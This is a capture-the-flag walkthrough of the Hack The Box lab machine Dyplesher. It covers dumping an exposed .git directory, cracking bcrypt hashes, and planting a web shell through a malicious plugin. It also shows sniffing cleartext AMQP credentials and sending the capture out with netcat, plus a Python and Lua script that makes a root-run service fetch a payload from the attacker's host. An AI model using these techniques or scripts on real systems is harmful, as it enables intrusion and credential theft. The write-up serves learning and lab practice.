HTB Walkthrough Dyplesher 10.10.10.190

Summary
Dyplesher was released on the 23rd of May 2020.
Foothold
This machine is rated Insane. To gain a foothold we had to dump the .git directory exposed on the test vhost.
User
After a lot of enumeration and a few logins we finally arrived at the login page where we can upload a malicious plugin, which gave us a web shell with code execution. With that I could write my SSH key for this user and log in to the box. Looking around we see that we are in a group called wireshark, which means we can capture packets and read the traffic. After studying the capture we got some new credentials and were able to get user.txt.
Root
felamos' home folder contains a hint that there is a tool which reviews plugin code automatically; after some research I found out this is driven over AMQP. To get root we abused that AMQP-driven plugin loader.
Enumeration
Nmap
nmap -p- -A 10.10.10.190


Web
Going to http://10.10.10.190 shows:

http://10.10.10.190/login shows:

Nothing interesting to find on here
The page showed earlier a hostname test.dyplesher.htb, so add test.dyplesher.htb to /etc/hosts:

http://test.dyplesher.htb shows:

Couldn't find anything on this page so I moved on.
http://10.10.10.190:3000 shows:

Also nothing to find right now.
The nmap result showed there should be a .git directory on port 80:

http://10.10.10.190/.git shows:

But since there is a vhost we should check this one as well:

Looks like something is there but directory listing is denied, so time to poke around a bit.
An exposed .git directory can be dumped even without directory listing by fetching the object files one by one; I found the following tool for that:
https://github.com/internetwache/GitTools
mkdir gitdump
bash Dumper/gitdumper.sh http://test.dyplesher.htb/.git/ /root/s3cwalk/dyplesher/gitdump/

We could extract some files:

When we look at the index we see the following:

index.php is missing from the working tree but is still tracked in the repository, so we can bring it back with git restore:
git restore index.php

index.php contains credentials for memcached (felamos:zxcvbnm). Port 11211 was also open in the nmap scan, so time to poke around there.
Memcached
Getting values out of memcached with memccat (from libmemcached-tools), authenticating over SASL with the credentials from index.php:
memccat email --servers=10.10.10.190 --username=felamos --password=zxcvbnm

MinatoTW@dyplesher.htb
felamos@dyplesher.htb
yuntao@dyplesher.htb
memccat username --servers=10.10.10.190 --username=felamos --password=zxcvbnm

MinatoTW
felamos
yuntao
memccat password --servers=10.10.10.190 --username=felamos --password=zxcvbnm
$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK
$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS
We found some valuable information. bcrypt hashes cannot be decrypted, but we can try to crack them with hashcat (mode 3200) against rockyou:
hashcat64.exe -m 3200 hashes.txt rockyou.txt

$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK:mommy1
Only the $2y$12 hash cracked. It is the second password value, matching the second username, so we can now log in to http://10.10.10.190:3000 as felamos with password mommy1:

When logged in there doesn't seem to be much, but under Releases there is a file called repo.zip:

This file contains a folder repositories with git bundle files. A bundle is a packaged repository, so let's git clone each of them:

git clone 4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
git clone 4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
git clone 6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
git clone d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

In the cloned 4e07408… repository there is a LoginSecurity plugin database file which contains another hash:
s3cwalk/dyplesher/repositories/@hashed/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity/user.db

$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6
Also bcrypt; cracking it the same way with hashcat gives the password alexis1.
Next step is to find out where to log in with it and with which username. From the web enumeration earlier there is still a page we weren't able to log in to, so let's try that one:
http://10.10.10.190/login

And we are logged in:

Time to develop our own malicious plugin. The idea: the panel loads uploaded plugins (Bukkit style: a plugin.yml descriptor plus a main class, packaged as a jar with Maven), so a plugin whose main class drops a PHP web shell into the web root of test.dyplesher.htb gives us command execution on the box.


adding new java package:

adding new class:

adding plugin.yml:

also create pom.xml
plugin.yml contains:

main contains:

pom.xml contains:

Time to build the jar file:

upload plugin

load plugin

check if plugin is loaded

Visit http://test.dyplesher.htb/secwalk.php?cmd=id to confirm we have command execution:

Write our SSH public key into MinatoTW's authorized_keys through the web shell:

Log in with SSH:

id shows that we are in the wireshark group, which lets us capture network traffic with tshark (it uses the dumpcap helper that group has access to):
tshark -i any -w secwalk.pcap

Transfer the capture to my machine with netcat so I can look at it in Wireshark. Start the listener on my machine first, then send from the box:
receive (my machine): nc -l -p 11211 > secwalk.pcap
send (the box): nc -w 3 10.10.14.12 11211 < secwalk.pcap
In the capture I found credentials in an AMQP packet. AMQP with the PLAIN SASL mechanism sends the username and password in cleartext inside the Connection.Start-Ok frame, so anyone who can sniff the link can read them:


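To show why those credentials are readable in the capture, here is an added example (not part of the original write-up or of any tool used in it) that encodes an AMQP 0-9-1 Connection.Start-Ok frame the way a client sends it and then parses the PLAIN SASL response back out of a raw client-to-server stream, the kind you get from Wireshark's "Follow TCP Stream" export. The sample stream, user and password are constructed here; they are not the values from the box.

```python
import struct

# AMQP 0-9-1 framing constants
FRAME_METHOD = 1
FRAME_END = 0xCE
CLASS_CONNECTION = 10
METHOD_START_OK = 11
PROTOCOL_HEADER = b"AMQP\x00\x00\x09\x01"   # first bytes the client sends


def _shortstr(s: bytes) -> bytes:
    return struct.pack("!B", len(s)) + s


def _longstr(s: bytes) -> bytes:
    return struct.pack("!I", len(s)) + s


def build_start_ok(user: bytes, password: bytes, mechanism: bytes = b"PLAIN") -> bytes:
    """Encode a Connection.Start-Ok method frame on channel 0, as a client sends it.

    With PLAIN the SASL response is NUL + user + NUL + password, in the clear:
    that is exactly what the write-up saw in the AMQP packet.
    """
    response = b"\x00" + user + b"\x00" + password
    client_properties = struct.pack("!I", 0)          # empty field table
    args = (client_properties + _shortstr(mechanism)
            + _longstr(response) + _shortstr(b"en_US"))
    payload = struct.pack("!HH", CLASS_CONNECTION, METHOD_START_OK) + args
    return struct.pack("!BHI", FRAME_METHOD, 0, len(payload)) + payload + bytes([FRAME_END])


def iter_frames(stream: bytes):
    """Yield (frame_type, channel, payload) for each frame in a client->server stream."""
    off = len(PROTOCOL_HEADER) if stream.startswith(PROTOCOL_HEADER) else 0
    while off + 7 <= len(stream):
        ftype, channel, size = struct.unpack_from("!BHI", stream, off)
        end = off + 7 + size
        if end >= len(stream) or stream[end] != FRAME_END:
            break                                     # truncated or not AMQP: stop, don't mis-parse
        yield ftype, channel, stream[off + 7:end]
        off = end + 1


def extract_plain_credentials(payload: bytes):
    """Return (user, password) if payload is a Start-Ok using PLAIN, else None."""
    try:
        class_id, method_id = struct.unpack_from("!HH", payload, 0)
        if (class_id, method_id) != (CLASS_CONNECTION, METHOD_START_OK):
            return None
        off = 4
        (table_len,) = struct.unpack_from("!I", payload, off)
        off += 4 + table_len                          # skip client-properties table
        mech_len = payload[off]
        mechanism = payload[off + 1:off + 1 + mech_len]
        off += 1 + mech_len
        (resp_len,) = struct.unpack_from("!I", payload, off)
        off += 4
        response = payload[off:off + resp_len]
    except (struct.error, IndexError):
        return None
    if mechanism != b"PLAIN":
        return None                                   # AMQPLAIN / EXTERNAL are encoded differently
    parts = response.split(b"\x00")                   # [authzid] NUL authcid NUL passwd
    if len(parts) != 3:
        return None
    return parts[1].decode("utf-8", "replace"), parts[2].decode("utf-8", "replace")


def find_plain_credentials(stream: bytes):
    """Scan a reassembled TCP stream for the first PLAIN login it carries."""
    for ftype, _channel, payload in iter_frames(stream):
        if ftype == FRAME_METHOD:
            creds = extract_plain_credentials(payload)
            if creds:
                return creds
    return None


# Constructed sample stream (not bytes from the box): protocol header followed by
# a Start-Ok login for a made-up user and password.
SAMPLE_STREAM = PROTOCOL_HEADER + build_start_ok(b"demo_user", b"demo_pass")

if __name__ == "__main__":
    print(find_plain_credentials(SAMPLE_STREAM))
```

Wireshark's own AMQP dissector decodes the same Start-Ok frame for you; the parser above is only there to make it obvious that nothing in the protocol hides the password, and that the fix on the server side is TLS (or a mechanism that is not PLAIN), not a longer password.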
And we got our first flag, user.txt:

felamos' home folder contains a hint for the root privesc:

Earlier in the capture there were also credentials for the AMQP service, and this service does exactly what the hint mentions, so let's try to exploit that.
First we need to create/edit a Python script so we can connect to the service and publish the URL of our plugin:

After this is done we create a Lua file which writes our SSH public key to root's authorized_keys. Our Lua payload file looks like:

Serve the payload over HTTP (here on port 5672) and send its URL to the queue:
python -m SimpleHTTPServer 5672
python3 shell.py http://10.10.14.12:5672/payload.lua
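The two files above (shell.py and payload.lua) are shown only as screenshots, so here is an added example of my own, not the author's script, that does the same job with the pika AMQP client. Everything not on the page is an assumption: the queue name plugin_data, the placeholder broker credentials (the real ones come from the AMQP packet in the capture), that the consumer fetches the URL it receives and executes the Lua as root, and that publishing to the default exchange with the queue name as routing key reaches that consumer.

```python
import os
import sys

# Placeholders / assumptions, not values from the write-up.
AMQP_HOST = "10.10.10.190"
AMQP_PORT = 5672
AMQP_USER = "<user from the pcap>"
AMQP_PASS = "<password from the pcap>"
PLUGIN_QUEUE = "plugin_data"          # assumed name of the plugin-review queue


def build_lua_payload(pubkey: str, authorized_keys: str = "/root/.ssh/authorized_keys") -> str:
    """Lua that appends our SSH public key to root's authorized_keys.

    Only gives root if the reviewing service really runs the fetched Lua as
    root (the assumption behind this privesc).  The key is embedded in a Lua
    string literal, so reject characters that would break out of it.
    """
    key = pubkey.strip()
    if not key or any(c in key for c in '"\\\n'):
        raise ValueError("public key contains characters that would break the Lua string")
    ssh_dir = os.path.dirname(authorized_keys)
    return "\n".join([
        f'os.execute("mkdir -p {ssh_dir} && chmod 700 {ssh_dir}")',
        f'local f = assert(io.open("{authorized_keys}", "a"))',
        f'f:write("{key}\\n")',
        "f:close()",
        f'os.execute("chmod 600 {authorized_keys}")',
    ]) + "\n"


def publish_plugin_url(url: str, host=AMQP_HOST, port=AMQP_PORT,
                       user=AMQP_USER, password=AMQP_PASS, queue=PLUGIN_QUEUE) -> None:
    """Publish the payload URL to the queue through the default exchange."""
    import pika  # imported here so the payload builder works without pika installed
    params = pika.ConnectionParameters(
        host=host, port=port, credentials=pika.PlainCredentials(user, password))
    conn = pika.BlockingConnection(params)
    try:
        ch = conn.channel()
        # No queue_declare: re-declaring an existing queue with different
        # flags is refused by the broker, and the consumer already owns it.
        ch.basic_publish(exchange="", routing_key=queue, body=url.encode())
    finally:
        conn.close()


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} http://<attacker>:<port>/payload.lua")
    with open(os.path.expanduser("~/.ssh/id_rsa.pub")) as fh:
        pubkey = fh.read()
    with open("payload.lua", "w") as fh:    # serve this directory over HTTP first
        fh.write(build_lua_payload(pubkey))
    publish_plugin_url(sys.argv[1])
    print("published", sys.argv[1], "to queue", PLUGIN_QUEUE)
```

Usage matches the write-up: write payload.lua, serve its directory with a simple HTTP server, then run the script with the URL. The key check matters more than it looks: anything that lets a quote or newline into the Lua string would be executed by the same root-level interpreter, so validate it even in throwaway tooling.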
We can see the command was successful:

And we got root on the box:

Job done
Made by: S3cwalk
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.